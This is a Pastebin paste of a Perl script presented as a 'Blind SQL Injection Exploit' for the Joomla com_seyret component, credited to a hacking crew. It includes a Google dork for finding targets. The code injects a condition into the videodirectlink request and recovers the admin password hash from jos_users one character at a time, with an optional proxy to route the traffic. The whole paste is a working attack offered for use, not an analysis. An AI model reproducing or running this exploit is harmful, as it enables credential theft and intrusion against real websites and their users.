Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- use LWP::UserAgent;
- use Getopt::Long;
- if(!$ARGV[1])
- {
- system("Title Albanian Hacking Crew");
- print " \n";
- print " #######################################################################\n";
- print " # Joomla Component (com_seyret) Blind SQL Injection Exploit \n";
- print " # -----------------------------------------------------------\n";
- print " # Author: **RoAd_KiLlEr** \n";
- print " # Greetz: Ton![W]indowS,X-n3t,b4cKd00r ~,DarkHacker.,The|DennY`\n";
- print " # Site: www.a-h-crew.net\n";
- print " # -----------------------------------------------------------\n";
- print " # Dork : inurl:com_seyret \n";
- print " # Usage: perl exploit.pl host path <options> \n";
- print " # Example: perl exploit.pl www.host.com /path/ -a 3 \n";
- print " # -----------------------------------------------------------\n";
- print " # Options: \n";
- print " # -a valid id \n";
- print " #######################################################################\n";
- exit;
- }
- my $host = $ARGV[0];
- my $path = $ARGV[1];
- my $userid = 1;
- my $aid = $ARGV[2];
- my %options = ();
- GetOptions(\%options, "u=i", "p=s", "a=i");
- print "[~] Exploiting...\n";
- if($options{"u"})
- {
- $userid = $options{"u"};
- }
- if($options{"a"})
- {
- $aid = $options{"a"};
- }
- syswrite(STDOUT, "[~] MD5-Hash: ", 14);
- for(my $i = 1; $i <= 32; $i++)
- {
- my $f = 0;
- my $h = 48;
- while(!$f && $h <= 57)
- {
- if(istrue2($host, $path, $userid, $aid, $i, $h))
- {
- $f = 1;
- syswrite(STDOUT, chr($h), 1);
- }
- $h++;
- }
- if(!$f)
- {
- $h = 97;
- while(!$f && $h <= 122)
- {
- if(istrue2($host, $path, $userid, $aid, $i, $h))
- {
- $f = 1;
- syswrite(STDOUT, chr($h), 1);
- }
- $h++;
- }
- }
- }
- print "\n[~] Exploiting done\n";
- sub istrue2
- {
- my $host = shift;
- my $path = shift;
- my $uid = shift;
- my $aid = shift;
- my $i = shift;
- my $h = shift;
- my $ua = LWP::UserAgent->new;
- my $query = "http://".$host.$path."index.php? option=com_seyret&task=videodirectlink&id=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=".$h."";
- if($options{"p"})
- {
- $ua->proxy('http', "http://".$options{"p"});
- }
- my $resp = $ua->get($query);
- my $content = $resp->content;
- my $regexp = "Back";
- if($content =~ /$regexp/)
- {
- return 1;
- }
- else
- {
- return 0;
- }
- }
Add Comment
Please, Sign In to add comment